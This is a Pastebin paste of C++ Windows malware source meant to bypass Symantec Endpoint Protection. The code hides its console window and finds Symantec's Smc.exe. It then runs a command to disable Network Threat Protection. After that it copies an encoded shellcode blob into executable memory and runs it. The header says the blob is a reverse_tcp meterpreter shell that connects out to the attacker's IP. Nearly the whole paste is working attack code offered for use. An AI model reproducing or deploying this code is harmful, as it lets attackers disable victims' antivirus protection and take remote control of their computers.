SHARE
TWEET

Untitled

a guest Mar 11th, 2013 665 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. /******************************************************************************************
  2. *   Author: @_dark_knight_
  3. *   Description: Bypassing Symantec Endpoint Protection.
  4. *                           This creates a reverse_tcp meterpreter shell
  5. *                           and stops Network Threat Protection to allow communication  out
  6. *                           to our attacking IP.
  7. *
  8. *   Special Notes: Process enumeration code lifted from: http://msdn.microsoft.com/en-
  9. *   us/library/windows/desktop/ms686701(v=vs.85).aspx
  10. *  
  11. *********************************************************************************************/
  12.  
  13. /*- Include files -*/
  14. #define _WIN32_WINNT 0x0500
  15. #include <iostream>
  16. #include <Windows.h>
  17. #include <tlhelp32.h>
  18. #include <tchar.h>
  19. #include <iostream>
  20. #include <WinBase.h>
  21.  
  22. //  Forward declarations:
  23. BOOL KillSymantec( );
  24.  
  25. int main()
  26. {
  27.         /*- Pointer to shellcode memory segment -*/
  28.         LPVOID lpvResult;
  29.  
  30.         /*- Hide console window -*/
  31.         HWND hWnd = GetConsoleWindow();
  32.         ShowWindow(hWnd, SW_HIDE);
  33.  
  34.         /*- Kill Symantec Endpoint Encryption if it is running -*/
  35.         KillSymantec();
  36.        
  37.         /* [*] x86/alpha_mixed succeeded with size 641 (iteration=1) */
  38.         char buf[] = "\x89\xe3\xdd\xc6\xd9\x73\xf4\x5e\x56\x59\x49\x49\x49\x49"
  39.                         "\x49\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51"
  40.                         "\x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32"
  41.                         "\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41"
  42.                         "\x42\x75\x4a\x49\x59\x6c\x4d\x38\x6e\x69\x77\x70\x33\x30"
  43.                         "\x65\x50\x73\x50\x4e\x69\x58\x65\x50\x31\x6a\x72\x72\x44"
  44.                         "\x4c\x4b\x36\x32\x56\x50\x6e\x6b\x42\x72\x44\x4c\x4e\x6b"
  45.                         "\x61\x42\x55\x44\x6e\x6b\x44\x32\x71\x38\x34\x4f\x48\x37"
  46.                         "\x33\x7a\x35\x76\x50\x31\x4b\x4f\x34\x71\x6f\x30\x4c\x6c"
  47.                         "\x47\x4c\x45\x31\x51\x6c\x57\x72\x46\x4c\x77\x50\x4a\x61"
  48.                         "\x48\x4f\x74\x4d\x76\x61\x48\x47\x6d\x32\x48\x70\x30\x52"
  49.                         "\x72\x77\x4e\x6b\x31\x42\x72\x30\x6e\x6b\x30\x42\x75\x6c"
  50.                         "\x55\x51\x5a\x70\x6c\x4b\x63\x70\x64\x38\x4e\x65\x39\x50"
  51.                         "\x51\x64\x70\x4a\x45\x51\x6a\x70\x70\x50\x6c\x4b\x47\x38"
  52.                         "\x75\x48\x6e\x6b\x32\x78\x35\x70\x36\x61\x48\x53\x48\x63"
  53.                         "\x67\x4c\x70\x49\x4e\x6b\x46\x54\x6e\x6b\x56\x61\x4b\x66"
  54.                         "\x75\x61\x39\x6f\x35\x61\x79\x50\x4c\x6c\x6a\x61\x5a\x6f"
  55.                         "\x64\x4d\x46\x61\x6b\x77\x65\x68\x4b\x50\x51\x65\x4b\x44"
  56.                         "\x43\x33\x43\x4d\x58\x78\x47\x4b\x43\x4d\x35\x74\x61\x65"
  57.                         "\x4a\x42\x71\x48\x6c\x4b\x71\x48\x66\x44\x55\x51\x4b\x63"
  58.                         "\x53\x56\x4c\x4b\x44\x4c\x50\x4b\x6e\x6b\x31\x48\x57\x6c"
  59.                         "\x75\x51\x4b\x63\x4c\x4b\x46\x64\x4e\x6b\x77\x71\x58\x50"
  60.                         "\x4b\x39\x62\x64\x44\x64\x45\x74\x31\x4b\x71\x4b\x71\x71"
  61.                         "\x73\x69\x63\x6a\x70\x51\x79\x6f\x4b\x50\x32\x78\x51\x4f"
  62.                         "\x52\x7a\x6c\x4b\x54\x52\x5a\x4b\x6f\x76\x43\x6d\x32\x48"
  63.                         "\x57\x43\x50\x32\x63\x30\x77\x70\x52\x48\x34\x37\x44\x33"
  64.                         "\x65\x62\x53\x6f\x32\x74\x33\x58\x72\x6c\x44\x37\x74\x66"
  65.                         "\x66\x67\x59\x6f\x68\x55\x4e\x58\x6a\x30\x53\x31\x53\x30"
  66.                         "\x53\x30\x31\x39\x49\x54\x30\x54\x76\x30\x63\x58\x71\x39"
  67.                         "\x4b\x30\x52\x4b\x67\x70\x59\x6f\x6a\x75\x70\x50\x66\x30"
  68.                         "\x30\x50\x50\x50\x43\x70\x46\x30\x61\x50\x46\x30\x31\x78"
  69.                         "\x6a\x4a\x34\x4f\x39\x4f\x6d\x30\x69\x6f\x48\x55\x4d\x47"
  70.                         "\x53\x5a\x37\x75\x53\x58\x79\x50\x6e\x48\x63\x31\x45\x34"
  71.                         "\x75\x38\x34\x42\x55\x50\x66\x61\x6d\x6b\x6c\x49\x6a\x46"
  72.                         "\x63\x5a\x72\x30\x61\x46\x53\x67\x65\x38\x4f\x69\x59\x35"
  73.                         "\x30\x74\x70\x61\x59\x6f\x48\x55\x4b\x35\x69\x50\x31\x64"
  74.                         "\x36\x6c\x49\x6f\x70\x4e\x67\x78\x51\x65\x6a\x4c\x43\x58"
  75.                         "\x7a\x50\x4c\x75\x6f\x52\x72\x76\x49\x6f\x5a\x75\x53\x5a"
  76.                         "\x75\x50\x63\x5a\x66\x64\x62\x76\x50\x57\x31\x78\x36\x62"
  77.                         "\x48\x59\x48\x48\x53\x6f\x6b\x4f\x38\x55\x4e\x6b\x77\x46"
  78.                         "\x72\x4a\x61\x50\x65\x38\x65\x50\x32\x30\x57\x70\x63\x30"
  79.                         "\x46\x36\x50\x6a\x47\x70\x53\x58\x56\x38\x49\x34\x53\x63"
  80.                         "\x6b\x55\x39\x6f\x6a\x75\x4e\x73\x36\x33\x50\x6a\x73\x30"
  81.                         "\x76\x36\x33\x63\x31\x47\x42\x48\x45\x52\x69\x49\x69\x58"
  82.                         "\x33\x6f\x6b\x4f\x38\x55\x67\x71\x4f\x33\x65\x79\x4f\x36"
  83.                         "\x6b\x35\x49\x66\x43\x45\x7a\x4c\x4b\x73\x41\x41";
  84.  
  85.                 /*- Allocate memory -*/
  86.                 lpvResult = VirtualAlloc(0, sizeof buf, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
  87.  
  88.                 /*- Copy shellcode to allocated memory -*/
  89.                 if (lpvResult != NULL ){
  90.                           RtlMoveMemory(lpvResult, buf, sizeof buf);   
  91.                           ((void(*)())lpvResult)();
  92.                 }      
  93.  
  94.                 /*- Cleanup -*/
  95.                 VirtualFree(lpvResult, 0, MEM_RELEASE);
  96.  
  97. }/*- End main -*/
  98.  
  99. /*- Enumerate process to confirm client is running Symantec Endpoint Protection.
  100. * Most of this code lifted from MSDN.
  101. -*/
  102. BOOL KillSymantec( )
  103. {
  104.   HANDLE hProcessSnap;
  105.   PROCESSENTRY32 pe32;
  106.  
  107.   // Take a snapshot of all processes in the system.
  108.   hProcessSnap = CreateToolhelp32Snapshot( TH32CS_SNAPPROCESS, 0 );
  109.   if( hProcessSnap == INVALID_HANDLE_VALUE )
  110.   {
  111.     return( FALSE );
  112.   }
  113.  
  114.   // Set the size of the structure before using it.
  115.   pe32.dwSize = sizeof( PROCESSENTRY32 );
  116.  
  117.   // Retrieve information about the first process,
  118.   // and exit if unsuccessful
  119.   if( !Process32First( hProcessSnap, &pe32 ) )
  120.   {
  121.     CloseHandle( hProcessSnap );          // clean the snapshot object
  122.     return( FALSE );
  123.   }
  124.  
  125.   /* Now walk the snapshot of processes, and when we find our target process
  126.    * disable the Network Threat Protection.
  127.    */
  128.   do
  129.   {
  130.  
  131.           if (_tcscmp(pe32.szExeFile,_T("Smc.exe")) == 0) {
  132.                  
  133.                   /*- Disable Network Threat Protection -*/
  134.                   system("\"C:\\Program Files\\Symantec\\Symantec Endpoint Protection\\Smc.exe\" -disable -ntp");
  135.  
  136.                  /*- Wait 10 sec for things to settle -*/
  137.                  Sleep(10000);
  138.  
  139.                  break;
  140.            }
  141.  
  142.   } while( Process32Next( hProcessSnap, &pe32 ) );
  143.  
  144.   CloseHandle( hProcessSnap );
  145.   return( TRUE );
  146. }
RAW Paste Data
Top